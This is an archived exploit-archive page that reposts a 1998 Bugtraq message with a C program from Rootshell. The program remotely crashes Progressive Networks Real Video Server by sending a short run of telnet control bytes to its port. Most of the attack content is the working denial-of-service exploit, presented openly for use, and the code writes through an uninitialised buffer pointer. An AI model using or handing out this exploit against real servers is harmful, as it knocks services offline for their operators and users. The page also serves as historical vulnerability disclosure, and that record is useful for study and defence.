DOS against realvideoserver by Progressive Networks

Summary
Description:Another DOS attack
Author:Rootshell
Compromise:remotely crash Progressive Networks Real Video Server
Vulnerable Systems:those running Progressive Networks Real Video Server. This includes the Linux version and the NT version
Date:15 January 1998
Details


Date: Thu, 15 Jan 1998 21:22:43 -0600
From: Aleph One <aleph1@DFW.DFW.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: pnserver exploit..

Courtesy of the fine folks at rootshell.

-- forward --

It seems that the pnserver bug was different than first thought.  The
telnet client sends 6 characters that crash the server when its own
maxbuffer is reached.  Here is a working exploit.

/*
 * pnserver exploit [1/15/98]
 *
 * Crash's Progressive Networks Real Video Server [ http://www.real.com/ ]
 *
 * [ http://www.rootshell.com/ ]
 *
 * Compiled under linux.
 *
 */

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

void main(int argc, char *argv[])
{
  struct sockaddr_in sin;
  struct hostent *hp;
  char *buffer;
  int sock;

  if (argc != 3) {
    printf("usage: %s <rvserver_host> <port>\n\nNote: Try port 7070.\n\n", argv[0]);
    exit(1);
  }
  hp = gethostbyname(argv[1]);
  if (hp==NULL) {
    printf("Unknown host: %s\n",argv[1]);
    exit(1);
  }
  bzero((char*) &sin, sizeof(sin));
  bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
  sin.sin_family = hp->h_addrtype;
  sin.sin_port = htons(atoi(argv[2]));
  sock = socket(AF_INET, SOCK_STREAM, 0);
  connect(sock,(struct sockaddr *) &sin, sizeof(sin));
  sprintf(buffer, "%c%c%c%c%c", 255, 244, 255, 253, 6);
  write(sock, &buffer[0], strlen(buffer));
  close(sock);
}

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]